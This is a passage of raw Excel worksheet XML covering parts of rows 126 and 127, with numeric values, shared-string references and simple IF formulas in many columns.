      <c r="CG126" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH126" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI126" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ126" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK126" s="104">
        <v>0.0</v>
      </c>
      <c r="CL126" s="104">
        <v>0.0</v>
      </c>
      <c r="CM126" s="105">
        <v>6950.0</v>
      </c>
      <c r="CN126" s="105">
        <v>1253.0</v>
      </c>
      <c r="CO126" s="105">
        <v>3652.0</v>
      </c>
      <c r="CP126" s="105">
        <v>9998.0</v>
      </c>
      <c r="CQ126" s="105">
        <v>3652.0</v>
      </c>
      <c r="CR126" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CS126" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CT126" s="105">
        <v>0.0</v>
      </c>
      <c r="CU126" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CV126" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CW126" s="105">
        <v>1253.0</v>
      </c>
      <c r="CX126" s="105">
        <v>3652.0</v>
      </c>
      <c r="CY126" s="105">
        <v>9998.0</v>
      </c>
      <c r="CZ126" s="105">
        <v>3652.0</v>
      </c>
      <c r="DA126" s="105" t="s">
        <v>12</v>
      </c>
      <c r="DB126" s="106">
        <f t="shared" si="176"/>
        <v>0.1802877698</v>
      </c>
      <c r="DC126" s="106">
        <f t="shared" si="177"/>
        <v>0.1802877698</v>
      </c>
      <c r="DD126" s="106" t="str">
        <f t="shared" si="178"/>
        <v>-</v>
      </c>
      <c r="DE126" s="106">
        <f t="shared" si="179"/>
        <v>0.5254676259</v>
      </c>
      <c r="DF126" s="106">
        <f t="shared" si="180"/>
        <v>0.5254676259</v>
      </c>
      <c r="DG126" s="106" t="str">
        <f t="shared" si="20"/>
        <v>-</v>
      </c>
      <c r="DH126" s="106" t="str">
        <f t="shared" si="181"/>
        <v>-</v>
      </c>
      <c r="DI126" s="106" t="str">
        <f t="shared" si="182"/>
        <v>-</v>
      </c>
      <c r="DJ126" s="106" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="DK126" s="141" t="s">
        <v>12</v>
      </c>
      <c r="DL126" s="141" t="s">
        <v>12</v>
      </c>
      <c r="DM126" s="108" t="s">
        <v>2157</v>
      </c>
      <c r="DN126" s="108">
        <v>64.0</v>
      </c>
      <c r="DO126" s="108">
        <v>723491.0</v>
      </c>
      <c r="DP126" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ126" s="108" t="s">
        <v>2157</v>
      </c>
      <c r="DR126" s="108">
        <v>64.0</v>
      </c>
      <c r="DS126" s="108">
        <v>723491.0</v>
      </c>
      <c r="DT126" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU126" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV126" s="108" t="str">
        <f t="shared" si="166"/>
        <v>-</v>
      </c>
      <c r="DW126" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX126" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY126" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ126" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA126" s="108">
        <v>0.0</v>
      </c>
      <c r="EB126" s="108">
        <v>0.0</v>
      </c>
      <c r="EC126" s="109">
        <v>6951.0</v>
      </c>
      <c r="ED126" s="109">
        <v>1253.0</v>
      </c>
      <c r="EE126" s="109">
        <v>3652.0</v>
      </c>
      <c r="EF126" s="109">
        <v>719839.0</v>
      </c>
      <c r="EG126" s="109">
        <v>3652.0</v>
      </c>
      <c r="EH126" s="109" t="s">
        <v>12</v>
      </c>
      <c r="EI126" s="109" t="s">
        <v>12</v>
      </c>
      <c r="EJ126" s="109">
        <v>0.0</v>
      </c>
      <c r="EK126" s="109" t="s">
        <v>12</v>
      </c>
      <c r="EL126" s="109" t="s">
        <v>12</v>
      </c>
      <c r="EM126" s="109">
        <v>1253.0</v>
      </c>
      <c r="EN126" s="109">
        <v>3652.0</v>
      </c>
      <c r="EO126" s="109">
        <v>719839.0</v>
      </c>
      <c r="EP126" s="109">
        <v>3652.0</v>
      </c>
      <c r="EQ126" s="109" t="s">
        <v>12</v>
      </c>
      <c r="ER126" s="110">
        <f t="shared" si="184"/>
        <v>0.1802877698</v>
      </c>
      <c r="ES126" s="110">
        <f t="shared" si="185"/>
        <v>0.1802877698</v>
      </c>
      <c r="ET126" s="110" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="EU126" s="110">
        <f t="shared" si="187"/>
        <v>0.5254676259</v>
      </c>
      <c r="EV126" s="110">
        <f t="shared" si="188"/>
        <v>0.5254676259</v>
      </c>
      <c r="EW126" s="110" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="EX126" s="110" t="str">
        <f t="shared" si="190"/>
        <v>-</v>
      </c>
      <c r="EY126" s="110" t="str">
        <f t="shared" si="191"/>
        <v>-</v>
      </c>
      <c r="EZ126" s="110" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="FA126" s="109" t="s">
        <v>12</v>
      </c>
      <c r="FB126" s="109" t="s">
        <v>12</v>
      </c>
      <c r="FC126" s="111" t="s">
        <v>2158</v>
      </c>
      <c r="FD126" s="111">
        <v>79.0</v>
      </c>
      <c r="FE126" s="111">
        <v>749043.0</v>
      </c>
      <c r="FF126" s="101" t="s">
        <v>578</v>
      </c>
      <c r="FG126" s="111" t="s">
        <v>2159</v>
      </c>
      <c r="FH126" s="111">
        <v>76.0</v>
      </c>
      <c r="FI126" s="111">
        <v>749026.0</v>
      </c>
      <c r="FJ126" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FK126" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FL126" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FM126" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN126" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FO126" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP126" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ126" s="111">
        <v>0.0</v>
      </c>
      <c r="FR126" s="111">
        <v>0.0</v>
      </c>
      <c r="FS126" s="112">
        <v>6950.0</v>
      </c>
      <c r="FT126" s="112">
        <v>6950.0</v>
      </c>
      <c r="FU126" s="112">
        <v>28413.0</v>
      </c>
      <c r="FV126" s="112">
        <v>719839.0</v>
      </c>
      <c r="FW126" s="112">
        <v>29204.0</v>
      </c>
      <c r="FX126" s="112" t="s">
        <v>12</v>
      </c>
      <c r="FY126" s="112" t="s">
        <v>12</v>
      </c>
      <c r="FZ126" s="112">
        <v>0.0</v>
      </c>
      <c r="GA126" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GB126" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GC126" s="112">
        <v>6950.0</v>
      </c>
      <c r="GD126" s="112">
        <v>28404.0</v>
      </c>
      <c r="GE126" s="112">
        <v>719839.0</v>
      </c>
      <c r="GF126" s="112">
        <v>29187.0</v>
      </c>
      <c r="GG126" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GH126" s="113">
        <f t="shared" si="193"/>
        <v>1</v>
      </c>
      <c r="GI126" s="113">
        <f t="shared" si="194"/>
        <v>1</v>
      </c>
      <c r="GJ126" s="113" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="GK126" s="113">
        <f t="shared" si="196"/>
        <v>4.088201439</v>
      </c>
      <c r="GL126" s="113">
        <f t="shared" si="197"/>
        <v>4.086906475</v>
      </c>
      <c r="GM126" s="113" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="GN126" s="113" t="str">
        <f t="shared" si="199"/>
        <v>-</v>
      </c>
      <c r="GO126" s="113" t="str">
        <f t="shared" si="200"/>
        <v>-</v>
      </c>
      <c r="GP126" s="113" t="str">
        <f t="shared" si="201"/>
        <v>-</v>
      </c>
      <c r="GQ126" s="170" t="s">
        <v>12</v>
      </c>
      <c r="GR126" s="170" t="s">
        <v>12</v>
      </c>
      <c r="GS126" s="142" t="s">
        <v>225</v>
      </c>
      <c r="GT126" s="94" t="s">
        <v>2160</v>
      </c>
      <c r="GU126" s="116" t="s">
        <v>2091</v>
      </c>
      <c r="GV126" s="116">
        <v>6.0</v>
      </c>
      <c r="GW126" s="116">
        <v>611.0</v>
      </c>
      <c r="GX126" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY126" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ126" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA126" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB126" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC126" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD126" s="131" t="s">
        <v>2091</v>
      </c>
      <c r="HE126" s="131" t="s">
        <v>2091</v>
      </c>
      <c r="HF126" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG126" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH126" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI126" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ126" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK126" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL126" s="93">
        <v>6951.0</v>
      </c>
      <c r="HM126" s="93">
        <f t="shared" si="83"/>
        <v>611</v>
      </c>
      <c r="HN126" s="93">
        <v>611.0</v>
      </c>
      <c r="HO126" s="93">
        <v>0.0</v>
      </c>
      <c r="HP126" s="93">
        <v>611.0</v>
      </c>
      <c r="HQ126" s="118">
        <f t="shared" si="53"/>
        <v>0.08791366906</v>
      </c>
      <c r="HR126" s="118">
        <f t="shared" si="54"/>
        <v>0.08791366906</v>
      </c>
      <c r="HS126" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT126" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU126" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV126" s="119" t="s">
        <v>2161</v>
      </c>
      <c r="HW126" s="119">
        <v>4.0</v>
      </c>
      <c r="HX126" s="119">
        <v>543.0</v>
      </c>
      <c r="HY126" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ126" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA126" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB126" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC126" s="120" t="s">
        <v>2162</v>
      </c>
      <c r="ID126" s="120" t="s">
        <v>2163</v>
      </c>
      <c r="IE126" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF126" s="120">
        <v>56610.0</v>
      </c>
      <c r="IG126" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH126" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II126" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ126" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK126" s="99">
        <v>181.0</v>
      </c>
      <c r="IL126" s="99">
        <v>181.0</v>
      </c>
      <c r="IM126" s="121">
        <f t="shared" si="159"/>
        <v>181</v>
      </c>
      <c r="IN126" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO126" s="98">
        <v>181.0</v>
      </c>
      <c r="IP126" s="123">
        <f t="shared" si="58"/>
        <v>0.02604316547</v>
      </c>
      <c r="IQ126" s="118">
        <f t="shared" si="59"/>
        <v>0.02604316547</v>
      </c>
      <c r="IR126" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS126" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT126" s="127"/>
      <c r="IU126" s="127"/>
      <c r="IV126" s="127"/>
      <c r="IW126" s="127"/>
      <c r="IX126" s="127"/>
      <c r="IY126" s="127"/>
      <c r="IZ126" s="127"/>
      <c r="JA126" s="127"/>
      <c r="JB126" s="127"/>
      <c r="JC126" s="127"/>
      <c r="JD126" s="127"/>
      <c r="JE126" s="127"/>
      <c r="JF126" s="127"/>
      <c r="JG126" s="127"/>
      <c r="JH126" s="127"/>
      <c r="JI126" s="127"/>
      <c r="JJ126" s="127"/>
      <c r="JK126" s="127"/>
      <c r="JL126" s="127"/>
      <c r="JM126" s="127"/>
      <c r="JN126" s="127"/>
      <c r="JO126" s="127"/>
      <c r="JP126" s="127"/>
      <c r="JQ126" s="127"/>
      <c r="JR126" s="127"/>
      <c r="JS126" s="127"/>
      <c r="JT126" s="127"/>
      <c r="JU126" s="127"/>
      <c r="JV126" s="127"/>
      <c r="JW126" s="127"/>
      <c r="JX126" s="127"/>
      <c r="JY126" s="127"/>
      <c r="JZ126" s="127"/>
      <c r="KA126" s="127"/>
      <c r="KB126" s="127"/>
      <c r="KC126" s="127"/>
      <c r="KD126" s="127"/>
      <c r="KE126" s="127"/>
      <c r="KF126" s="127"/>
      <c r="KG126" s="127"/>
      <c r="KH126" s="127"/>
      <c r="KI126" s="127"/>
      <c r="KJ126" s="127"/>
      <c r="KK126" s="127"/>
      <c r="KL126" s="127"/>
      <c r="KM126" s="127"/>
      <c r="KN126" s="127"/>
      <c r="KO126" s="127"/>
      <c r="KP126" s="127"/>
      <c r="KQ126" s="127"/>
      <c r="KR126" s="127"/>
      <c r="KS126" s="127"/>
      <c r="KT126" s="127"/>
      <c r="KU126" s="127"/>
      <c r="KV126" s="127"/>
      <c r="KW126" s="127"/>
      <c r="KX126" s="127"/>
      <c r="KY126" s="127"/>
      <c r="KZ126" s="127"/>
      <c r="LA126" s="127"/>
      <c r="LB126" s="127"/>
      <c r="LC126" s="127"/>
      <c r="LD126" s="127"/>
      <c r="LE126" s="127"/>
      <c r="LF126" s="127"/>
      <c r="LG126" s="127"/>
      <c r="LH126" s="127"/>
      <c r="LI126" s="127"/>
      <c r="LJ126" s="127"/>
      <c r="LK126" s="127"/>
      <c r="LL126" s="127"/>
      <c r="LM126" s="127"/>
      <c r="LN126" s="127"/>
      <c r="LO126" s="127"/>
      <c r="LP126" s="127"/>
      <c r="LQ126" s="127"/>
      <c r="LR126" s="127"/>
      <c r="LS126" s="127"/>
      <c r="LT126" s="127"/>
      <c r="LU126" s="127"/>
      <c r="LV126" s="127"/>
      <c r="LW126" s="127"/>
      <c r="LX126" s="127"/>
      <c r="LY126" s="127"/>
      <c r="LZ126" s="127"/>
      <c r="MA126" s="127"/>
      <c r="MB126" s="127"/>
      <c r="MC126" s="127"/>
      <c r="MD126" s="127"/>
      <c r="ME126" s="127"/>
      <c r="MF126" s="127"/>
      <c r="MG126" s="127"/>
      <c r="MH126" s="127"/>
      <c r="MI126" s="127"/>
      <c r="MJ126" s="127"/>
      <c r="MK126" s="127"/>
      <c r="ML126" s="127"/>
      <c r="MM126" s="127"/>
      <c r="MN126" s="127"/>
      <c r="MO126" s="127"/>
      <c r="MP126" s="127"/>
      <c r="MQ126" s="127"/>
      <c r="MR126" s="127"/>
      <c r="MS126" s="127"/>
      <c r="MT126" s="127"/>
      <c r="MU126" s="127"/>
      <c r="MV126" s="127"/>
      <c r="MW126" s="127"/>
      <c r="MX126" s="127"/>
      <c r="MY126" s="127"/>
      <c r="MZ126" s="127"/>
      <c r="NA126" s="127"/>
      <c r="NB126" s="127"/>
      <c r="NC126" s="127"/>
      <c r="ND126" s="127"/>
      <c r="NE126" s="127"/>
      <c r="NF126" s="127"/>
      <c r="NG126" s="127"/>
      <c r="NH126" s="127"/>
      <c r="NI126" s="127"/>
      <c r="NJ126" s="127"/>
      <c r="NK126" s="127"/>
      <c r="NL126" s="127"/>
      <c r="NM126" s="127"/>
      <c r="NN126" s="127"/>
      <c r="NO126" s="127"/>
      <c r="NP126" s="127"/>
      <c r="NQ126" s="127"/>
      <c r="NR126" s="127"/>
      <c r="NS126" s="127"/>
      <c r="NT126" s="127"/>
      <c r="NU126" s="127"/>
      <c r="NV126" s="127"/>
      <c r="NW126" s="127"/>
      <c r="NX126" s="127"/>
      <c r="NY126" s="127"/>
    </row>
    <row r="127" ht="153.75" customHeight="1">
      <c r="B127" s="89" t="s">
        <v>2093</v>
      </c>
      <c r="C127" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D127" s="90" t="s">
        <v>2094</v>
      </c>
      <c r="E127" s="90" t="s">
        <v>2108</v>
      </c>
      <c r="F127" s="90" t="s">
        <v>2109</v>
      </c>
      <c r="G127" s="90" t="s">
        <v>2146</v>
      </c>
      <c r="H127" s="90" t="s">
        <v>2147</v>
      </c>
      <c r="I127" s="92" t="s">
        <v>2148</v>
      </c>
      <c r="J127" s="92" t="s">
        <v>2164</v>
      </c>
      <c r="K127" s="92" t="s">
        <v>2165</v>
      </c>
      <c r="L127" s="93" t="s">
        <v>375</v>
      </c>
      <c r="M127" s="93">
        <v>385.0</v>
      </c>
      <c r="N127" s="93">
        <v>385.0</v>
      </c>
      <c r="O127" s="93">
        <v>0.0</v>
      </c>
      <c r="P127" s="93">
        <v>4615.0</v>
      </c>
      <c r="Q127" s="93">
        <f t="shared" si="204"/>
        <v>4615</v>
      </c>
      <c r="R127" s="93">
        <v>4615.0</v>
      </c>
      <c r="S127" s="93">
        <v>0.0</v>
      </c>
      <c r="T127" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U127" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V127" s="96" t="s">
        <v>2151</v>
      </c>
      <c r="W127" s="96" t="s">
        <v>2166</v>
      </c>
      <c r="X127" s="97" t="s">
        <v>2167</v>
      </c>
      <c r="Y127" s="126" t="s">
        <v>2168</v>
      </c>
      <c r="Z127" s="96" t="s">
        <v>2169</v>
      </c>
      <c r="AA127" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB127" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC127" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD127" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE127" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF127" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG127" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH127" s="99" t="s">
        <v>2156</v>
      </c>
      <c r="AI127" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ127" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK127" s="100" t="s">
        <v>2170</v>
      </c>
      <c r="AL127" s="100">
        <v>43.0</v>
      </c>
      <c r="AM127" s="100">
        <v>62.0</v>
      </c>
      <c r="AN127" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO127" s="100" t="s">
        <v>2170</v>
      </c>
      <c r="AP127" s="100">
        <v>43.0</v>
      </c>
      <c r="AQ127" s="100">
        <v>62.0</v>
      </c>
      <c r="AR127" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS127" s="165" t="s">
        <v>12</v>
      </c>
      <c r="AT127" s="100" t="str">
        <f t="shared" ref="AT127:AT130" si="214">IF(AR127="-",AS127,AR127)</f>
        <v>-</v>
      </c>
      <c r="AU127" s="165" t="s">
        <v>12</v>
      </c>
      <c r="AV127" s="165" t="s">
        <v>12</v>
      </c>
      <c r="AW127" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX127" s="165" t="s">
        <v>12</v>
      </c>
      <c r="AY127" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ127" s="100">
        <v>0.0</v>
      </c>
      <c r="BA127" s="102">
        <v>385.0</v>
      </c>
      <c r="BB127" s="102">
        <v>0.0</v>
      </c>
      <c r="BC127" s="102">
        <v>0.0</v>
      </c>
      <c r="BD127" s="102">
        <v>62.0</v>
      </c>
      <c r="BE127" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BF127" s="102">
        <v>0.0</v>
      </c>
      <c r="BG127" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BH127" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BI127" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ127" s="102">
        <v>0.0</v>
      </c>
      <c r="BK127" s="102">
        <v>62.0</v>
      </c>
      <c r="BL127" s="103">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="BM127" s="103">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="BN127" s="103" t="str">
        <f t="shared" si="169"/>
        <v>-</v>
      </c>
      <c r="BO127" s="103">
        <f t="shared" si="170"/>
        <v>0</v>
      </c>
      <c r="BP127" s="103">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="BQ127" s="103" t="str">
        <f t="shared" si="172"/>
        <v>-</v>
      </c>
      <c r="BR127" s="103">
        <f t="shared" si="173"/>
        <v>0.01343445287</v>
      </c>
      <c r="BS127" s="103">
        <f t="shared" si="174"/>
        <v>0.01343445287</v>
      </c>
      <c r="BT127" s="103" t="str">
        <f t="shared" si="175"/>
        <v>-</v>
      </c>
      <c r="BU127" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BV127" s="102" t="s">
        <v>12</v>
      </c>
      <c r="BW127" s="104" t="s">
        <v>2171</v>
      </c>
      <c r="BX127" s="104">
        <v>57.0</v>
      </c>
      <c r="BY127" s="104">
        <v>83.0</v>
      </c>
      <c r="BZ127" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA127" s="104" t="s">
        <v>2172</v>
      </c>
      <c r="CB127" s="104">
        <v>57.0</v>
      </c>
      <c r="CC127" s="104">
        <v>83.0</v>
      </c>
      <c r="CD127" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE127" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF127" s="104" t="str">
        <f t="shared" ref="CF127:CF139" si="215">IF(CD127="-",CE127,CD127)</f>
        <v>-</v>
      </c>
      <c r="CG127" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH127" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI127" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ127" s="129" t="s">
        <v>12</v>
      </c>
      <c r="CK127" s="104">
        <v>0.0</v>
      </c>
      <c r="CL127" s="104">
        <v>0.0</v>
      </c>
      <c r="CM127" s="105">
        <v>385.0</v>
      </c>
      <c r="CN127" s="105">
        <v>14.0</v>
      </c>
      <c r="CO127" s="105">
        <v>20.0</v>
      </c>
      <c r="CP127" s="105">
        <v>62.0</v>
      </c>
      <c r="CQ127" s="105">
        <v>21.0</v>
      </c>
      <c r="CR127" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CS127" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CT127" s="105">
        <v>0.0</v>
      </c>
      <c r="CU127" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CV127" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CW127" s="105">
        <v>14.0</v>
      </c>
      <c r="CX127" s="105">
        <v>20.0</v>
      </c>
      <c r="CY127" s="105">
        <v>62.0</v>
      </c>
      <c r="CZ127" s="105">
        <v>21.0</v>
      </c>
      <c r="DA127" s="105" t="s">
        <v>12</v>
      </c>
      <c r="DB127" s="106">
        <f t="shared" si="176"/>
        <v>0.03636363636</v>
      </c>
      <c r="DC127" s="106">
        <f t="shared" si="177"/>
        <v>0.03636363636</v>
      </c>
      <c r="DD127" s="106" t="str">
        <f t="shared" si="178"/>
        <v>-</v>
      </c>
      <c r="DE127" s="106">
        <f t="shared" si="179"/>
        <v>0.004333694475</v>
      </c>
      <c r="DF127" s="106">
        <f t="shared" si="180"/>
        <v>0.004333694475</v>
      </c>
      <c r="DG127" s="106" t="str">
        <f t="shared" si="20"/>
        <v>-</v>
      </c>
      <c r="DH127" s="106" t="str">
        <f t="shared" si="181"/>
        <v>-</v>
      </c>
      <c r="DI127" s="106" t="str">
        <f t="shared" si="182"/>
        <v>-</v>
      </c>
      <c r="DJ127" s="106" t="str">
        <f t="shared" si="183"/>
        <v>-</v>
      </c>
      <c r="DK127" s="141" t="s">
        <v>12</v>
      </c>
      <c r="DL127" s="141" t="s">
        <v>12</v>
      </c>
      <c r="DM127" s="108" t="s">
        <v>2173</v>
      </c>
      <c r="DN127" s="108">
        <v>62.0</v>
      </c>
      <c r="DO127" s="108">
        <v>4750.0</v>
      </c>
      <c r="DP127" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ127" s="108" t="s">
        <v>2173</v>
      </c>
      <c r="DR127" s="108">
        <v>62.0</v>
      </c>
      <c r="DS127" s="108">
        <v>4750.0</v>
      </c>
      <c r="DT127" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU127" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV127" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DW127" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX127" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY127" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ127" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA127" s="108">
        <v>0.0</v>
      </c>
      <c r="EB127" s="108">
        <v>0.0</v>
      </c>
      <c r="EC127" s="109">
        <v>385.0</v>
      </c>
      <c r="ED127" s="109">
        <v>14.0</v>
      </c>
      <c r="EE127" s="109">
        <v>20.0</v>
      </c>
      <c r="EF127" s="109">
        <v>4729.0</v>
      </c>
      <c r="EG127" s="109">
        <v>21.0</v>
      </c>
      <c r="EH127" s="109" t="s">
        <v>12</v>
      </c>
      <c r="EI127" s="109" t="s">
        <v>12</v>
      </c>
      <c r="EJ127" s="109">
        <v>0.0</v>
      </c>
      <c r="EK127" s="109" t="s">
        <v>12</v>
      </c>
      <c r="EL127" s="109" t="s">
        <v>12</v>
      </c>
      <c r="EM127" s="109">
        <v>14.0</v>
      </c>
      <c r="EN127" s="109">
        <v>20.0</v>
      </c>
      <c r="EO127" s="109">
        <v>4729.0</v>
      </c>
      <c r="EP127" s="109">
        <v>21.0</v>
      </c>
      <c r="EQ127" s="109" t="s">
        <v>12</v>
      </c>
      <c r="ER127" s="110">
        <f t="shared" si="184"/>
        <v>0.03636363636</v>
      </c>
      <c r="ES127" s="110">
        <f t="shared" si="185"/>
        <v>0.03636363636</v>
      </c>
      <c r="ET127" s="110" t="str">
        <f t="shared" si="186"/>
        <v>-</v>
      </c>
      <c r="EU127" s="110">
        <f t="shared" si="187"/>
        <v>0.004333694475</v>
      </c>
      <c r="EV127" s="110">
        <f t="shared" si="188"/>
        <v>0.004333694475</v>
      </c>
      <c r="EW127" s="110" t="str">
        <f t="shared" si="189"/>
        <v>-</v>
      </c>
      <c r="EX127" s="110" t="str">
        <f t="shared" si="190"/>
        <v>-</v>
      </c>
      <c r="EY127" s="110" t="str">
        <f t="shared" si="191"/>
        <v>-</v>
      </c>
      <c r="EZ127" s="110" t="str">
        <f t="shared" si="192"/>
        <v>-</v>
      </c>
      <c r="FA127" s="109" t="s">
        <v>12</v>
      </c>
      <c r="FB127" s="109" t="s">
        <v>12</v>
      </c>
      <c r="FC127" s="111" t="s">
        <v>2174</v>
      </c>
      <c r="FD127" s="111">
        <v>74.0</v>
      </c>
      <c r="FE127" s="111">
        <v>4921.0</v>
      </c>
      <c r="FF127" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG127" s="111" t="s">
        <v>2175</v>
      </c>
      <c r="FH127" s="111">
        <v>72.0</v>
      </c>
      <c r="FI127" s="111">
        <v>4917.0</v>
      </c>
      <c r="FJ127" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FK127" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FL127" s="111" t="str">
        <f t="shared" ref="FL127:FL139" si="216">IF(FJ127="-",FK127,FJ127)</f>
        <v>2002752, 2002749</v>
      </c>
      <c r="FM127" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN127" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FO127" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP127" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ127" s="111">
        <v>0.0</v>
      </c>
      <c r="FR127" s="111">
        <v>0.0</v>
      </c>
      <c r="FS127" s="112">
        <v>385.0</v>
      </c>
      <c r="FT127" s="112">
        <v>88.0</v>
      </c>
      <c r="FU127" s="112">
        <v>185.0</v>
      </c>
      <c r="FV127" s="112">
        <v>4729.0</v>
      </c>
      <c r="FW127" s="112">
        <v>192.0</v>
      </c>
      <c r="FX127" s="112" t="s">
        <v>12</v>
      </c>
      <c r="FY127" s="112" t="s">
        <v>12</v>
      </c>
      <c r="FZ127" s="112">
        <v>0.0</v>
      </c>
      <c r="GA127" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GB127" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GC127" s="112">
        <v>88.0</v>
      </c>
      <c r="GD127" s="112">
        <v>183.0</v>
      </c>
      <c r="GE127" s="112">
        <v>4729.0</v>
      </c>
      <c r="GF127" s="112">
        <v>188.0</v>
      </c>
      <c r="GG127" s="112" t="s">
        <v>12</v>
      </c>
      <c r="GH127" s="113">
        <f t="shared" si="193"/>
        <v>0.2285714286</v>
      </c>
      <c r="GI127" s="113">
        <f t="shared" si="194"/>
        <v>0.2285714286</v>
      </c>
      <c r="GJ127" s="113" t="str">
        <f t="shared" si="195"/>
        <v>-</v>
      </c>
      <c r="GK127" s="113">
        <f t="shared" si="196"/>
        <v>0.04008667389</v>
      </c>
      <c r="GL127" s="113">
        <f t="shared" si="197"/>
        <v>0.03965330444</v>
      </c>
      <c r="GM127" s="113" t="str">
        <f t="shared" si="198"/>
        <v>-</v>
      </c>
      <c r="GN127" s="113" t="str">
        <f t="shared" si="199"/>
        <v>-</v>
      </c>
      <c r="GO127" s="113" t="str">
        <f t="shared" si="200"/>
        <v>-</v>
      </c>
